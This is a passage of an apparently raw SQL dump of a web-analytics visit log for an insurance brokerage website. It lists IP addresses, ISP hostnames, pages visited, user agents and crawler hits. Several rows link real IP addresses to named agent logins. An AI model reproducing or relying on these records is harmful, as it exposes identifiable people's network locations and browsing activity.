(KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(4728,'0b_55d58c3c955b3bb8649c74331b6950ed','1457983103','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(4731,'0b_7fce87c1313b588a8a3a6904a2f8af20','1457984876','216.81.71.91','216.81.71.91','/','=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16','','',0,'Win7','','','','','','','','','0','0',0),(4733,'0b_10558061f09d405de79df0ef4a67a6c7','1457985340','138.201.46.148','static.148.46.201.138.clients.your-server.de','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50','http://EMPIREINS.com','',0,'WinXP','Opera 8','de','','','','','','','0','0',0),(4734,'0b_562656287b3d3bc95181998e9eac147d','1457985584','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(4737,'0b_267bac1038b983125387bb7d2b88cba3','1457986111','45.22.213.129','45-22-213-129.lightspeed.miamfl.sbcglobal.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','','Google','','','','','0','0',0),(4740,'0b_267bac1038b983125387bb7d2b88cba3','1457986112','45.22.213.129','45-22-213-129.lightspeed.miamfl.sbcglobal.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','','Google','','','','','0','0',0),(4743,'0b_267bac1038b983125387bb7d2b88cba3','1457986115','45.22.213.129','45-22-213-129.lightspeed.miamfl.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(4745,'0b_e98b46a6d81bcfb9c858f86f72087a0e','1457986898','71.189.164.218','static-71-189-164-218.lsanca.fios.verizon.net','/about-us/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','us','','','GimmeUSAbot','','','','0','0',0),(4746,'0b_e98b46a6d81bcfb9c858f86f72087a0e','1457986898','71.189.164.218','static-71-189-164-218.lsanca.fios.verizon.net','/contact/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','us','','','GimmeUSAbot','','','','0','0',0),(4749,'0b_7ecaef27b94bd2504de288178c177503','1457987819','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(4751,'0b_7ecaef27b94bd2504de288178c177503','1457987821','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','0',0),(4752,'0b_7ecaef27b94bd2504de288178c177503','1457987842','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(4755,'0b_7ecaef27b94bd2504de288178c177503','1457987847','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(4757,'0b_7ecaef27b94bd2504de288178c177503','1457988278','50.108.156.48','50.108.156.48','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(4760,'0b_9f336388f0a238c467829c79523af4c2','1457988860','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','1024 x 768','Google','','','','','0','0',0),(4763,'0b_9f336388f0a238c467829c79523af4c2','1457988873','209.64.152.62','209.64.152.62','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1024 x 768','','','','','','0','0',0),(4764,'0b_9f336388f0a238c467829c79523af4c2','1457988895','209.64.152.62','209.64.152.62','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1024 x 768','','','','','','0','0',0),(4767,'0b_6e014506dd3e7ab27b07a0198051c22c','1457988969','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(4770,'0b_6e014506dd3e7ab27b07a0198051c22c','1457988970','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(4772,'0b_c84aafbb4ecb75c6945bdfcadb40d9a8','1457989069','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(4775,'0b_c84aafbb4ecb75c6945bdfcadb40d9a8','1457989071','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(4776,'0b_f10e24fffcae116fc39c18a14447cb28','1457989599','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4778,'0b_f10e24fffcae116fc39c18a14447cb28','1457989602','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4779,'0b_f10e24fffcae116fc39c18a14447cb28','1457989799','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(4781,'0b_9f336388f0a238c467829c79523af4c2','1457990028','209.64.152.62','209.64.152.62','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1024 x 768','','','','','','0','51',0),(4782,'0b_6e014506dd3e7ab27b07a0198051c22c','1457990952','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(4785,'0b_6e014506dd3e7ab27b07a0198051c22c','1457990953','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(4787,'0b_baea64fab691f623cbf3d7192e67b06d','1457991282','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(4790,'0b_ed1d0daadf6d6573198518cd65c9571a','1457991446','69.30.213.138','69.30.213.138','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(4793,'0b_ed1d0daadf6d6573198518cd65c9571a','1457991458','69.30.213.138','69.30.213.138','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4794,'0b_ed1d0daadf6d6573198518cd65c9571a','1457991468','69.30.213.138','69.30.213.138','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4796,'0b_ed1d0daadf6d6573198518cd65c9571a','1457991479','69.30.213.138','69.30.213.138','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4799,'0b_ed1d0daadf6d6573198518cd65c9571a','1457991491','69.30.213.138','69.30.213.138','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4800,'0b_ed1d0daadf6d6573198518cd65c9571a','1457991502','69.30.213.138','69.30.213.138','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4803,'0b_ed1d0daadf6d6573198518cd65c9571a','1457991514','69.30.213.138','69.30.213.138','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(4806,'0b_97d33f8a703e9fef2de864d07e337d3f','1457991560','157.55.39.100','msnbot-157-55-39-100.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4808,'0b_ca6b6aa91007513e4a79396e52894ce0','1457992296','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(4809,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992301','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(4812,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992318','75.99.37.250','ool-4b6325fa.static.optonline.net','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4814,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992323','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/case-status/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4817,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992339','75.99.37.250','ool-4b6325fa.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4818,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992354','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4821,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992369','75.99.37.250','ool-4b6325fa.static.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4824,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992387','75.99.37.250','ool-4b6325fa.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4826,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992396','75.99.37.250','ool-4b6325fa.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/carrier-field-underwriting-guides/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4827,'0b_b0b949272812c2026f8f038c15c903e0','1457992407','198.39.7.131','198.39.7.131','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empire%20insurance%20brokerage&qs=n&form=QBRE&pq=empire%20insurance%20brokerage&sc=3-26&sp=-1&sk=&cvid=4B34A4B0CD044CA69698889CE96D459C','empire insurance brokerage',1,'Win7 x64','IE 11','us','','Bing','','','','','0','0',0),(4829,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992420','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4832,'0b_b0b949272812c2026f8f038c15c903e0','1457992421','198.39.7.131','198.39.7.131','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(4835,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992441','75.99.37.250','ool-4b6325fa.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4836,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992459','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4839,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992488','75.99.37.250','ool-4b6325fa.static.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4841,'0b_d4b8555ff48ec6a720f232f5eba779a3','1457992504','75.99.37.250','ool-4b6325fa.static.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(4844,'0b_b0b949272812c2026f8f038c15c903e0','1457992681','198.39.7.131','198.39.7.131','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1600 x 1200','','','','','','0','0',0),(4847,'0b_b0b949272812c2026f8f038c15c903e0','1457992706','198.39.7.131','198.39.7.131','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','1600 x 1200','','','','','','0','51',0),(4848,'0b_b0b949272812c2026f8f038c15c903e0','1457993131','198.39.7.131','198.39.7.131','/insentives/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/meet-the-eib-team/','',0,'Win7 x64','IE 11','us','1600 x 1200','','','','','','0','51',0),(4850,'0b_1dff0826e81095bd499016f14746c9da','1457993994','52.71.155.178','nat-service.aws.kontera.com','/term-quotes/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(4851,'0b_1dff0826e81095bd499016f14746c9da','1457993994','52.71.155.178','nat-service.aws.kontera.com','/robots.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','Unknown Spider','','','','0','0',0),(4853,'0b_1dff0826e81095bd499016f14746c9da','1457993994','52.71.155.178','nat-service.aws.kontera.com','/robots.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(4856,'0b_1dff0826e81095bd499016f14746c9da','1457993996','52.71.155.178','nat-service.aws.kontera.com','/forms/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(4859,'0b_1dff0826e81095bd499016f14746c9da','1457993997','52.71.155.178','nat-service.aws.kontera.com','/robots.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(4862,'0b_1dff0826e81095bd499016f14746c9da','1457993998','52.71.155.178','nat-service.aws.kontera.com','/agent-tools/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(4863,'0b_1dff0826e81095bd499016f14746c9da','1457993999','52.71.155.178','nat-service.aws.kontera.com','/life-product-search/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(4865,'0b_1dff0826e81095bd499016f14746c9da','1457993999','52.71.155.178','nat-service.aws.kontera.com','/underwriting-cheat-sheets/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25','','',0,'MacOSX','Safari 8','','','','','','','','0','0',0),(4868,'0b_4a62f9f93ee13deda6e43e0437142671','1457995940','207.46.13.148','msnbot-207-46-13-148.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4869,'0b_1ad1d2f41b7a67b961c34d02f1cc68ae','1457998272','164.132.161.48','hydrogen146.a.ahrefs.com','/case-status/','Mozilla/5.0 (compatible; AhrefsBot/5.0; +http://ahrefs.com/robot/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(4872,'0b_dd89959c89250bfa851fe88bd4c0877b','1457998363','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4874,'0b_d3034249210287c14789d96730ffeef7','1457998823','201.173.107.39','cablelink-173-107-39.cpe.intercable.net','/','Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(4875,'0b_0a79ffe4cab8c1b37f40803f8cd970ea','1458002405','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4878,'0b_ce1c37f01ece4c0de6c4e3e70fc7ddeb','1458003357','104.236.244.32','104.236.244.32','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36','','',0,'Win8','Chrome 34','us','','','','','','','0','0',0),(4881,'0b_045aa82182aa2187b8c9e8fd79cbcf30','1458003363','104.236.244.32','104.236.244.32','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7 x64','Firefox 21','','','','','','','','0','0',0),(4883,'0b_3b3c16fd085ef90d37a138ca49bfe977','1458003374','104.236.244.32','104.236.244.32','/robots.txt','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14','','',0,'MacOSX','Safari 7','','','','Unknown Spider','','','','0','0',0),(4886,'0b_ce1c37f01ece4c0de6c4e3e70fc7ddeb','1458003385','104.236.244.32','104.236.244.32','/contact/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36','http://www.empireins.com','',0,'Win8','Chrome 34','us','','','','','','','0','0',0),(4887,'0b_7c71caf7332b1787ec6885f691cff7a5','1458003385','104.236.244.32','104.236.244.32','/insentives/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36','http://www.empireins.com','',0,'MacOSX','Chrome 35','','','','','','','','0','0',0),(4889,'0b_7c71caf7332b1787ec6885f691cff7a5','1458003395','104.236.244.32','104.236.244.32','/forms/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36','http://www.empireins.com','',0,'MacOSX','Chrome 35','','','','','','','','0','0',0),(4892,'0b_ce1c37f01ece4c0de6c4e3e70fc7ddeb','1458003395','104.236.244.32','104.236.244.32','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36','http://www.empireins.com','',0,'Win7','Chrome 34','us','','','','','','','0','0',0),(4895,'0b_005e3371d7a292130087e0d45363695d','1458003897','208.115.111.66','208-115-111-66-reverse.wowrack.com','/case-status/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4896,'0b_ef454e92a2c046c10595c7e45e527634','1458004612','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4899,'0b_ef454e92a2c046c10595c7e45e527634','1458004623','50.108.156.48','50.108.156.48','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4901,'0b_ef454e92a2c046c10595c7e45e527634','1458004648','50.108.156.48','50.108.156.48','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(4904,'0b_ef454e92a2c046c10595c7e45e527634','1458004701','50.108.156.48','50.108.156.48','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','ykaufman','','0','51',0),(4907,'0b_1d072ab921ea3dbd300aa16ab48f88b9','1458005487','66.249.73.194','crawl-66-249-73-194.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4908,'0b_b29bba27284267a427047118cb518c24','1458005488','66.249.73.194','crawl-66-249-73-194.googlebot.com','/products.html','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(4910,'0b_e1b70a5199cec38f1f0d2df4fc4a7c3a','1458005496','40.77.167.46','msnbot-40-77-167-46.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4911,'0b_edd3b56f19ebed2a386996eb99f25f7f','1458005790','52.73.242.77','ec2-52-73-242-77.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4914,'0b_edd3b56f19ebed2a386996eb99f25f7f','1458005791','52.73.242.77','ec2-52-73-242-77.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4917,'0b_edd3b56f19ebed2a386996eb99f25f7f','1458005792','52.73.242.77','ec2-52-73-242-77.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4920,'0b_edd3b56f19ebed2a386996eb99f25f7f','1458005793','52.73.242.77','ec2-52-73-242-77.compute-1.amazonaws.com','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 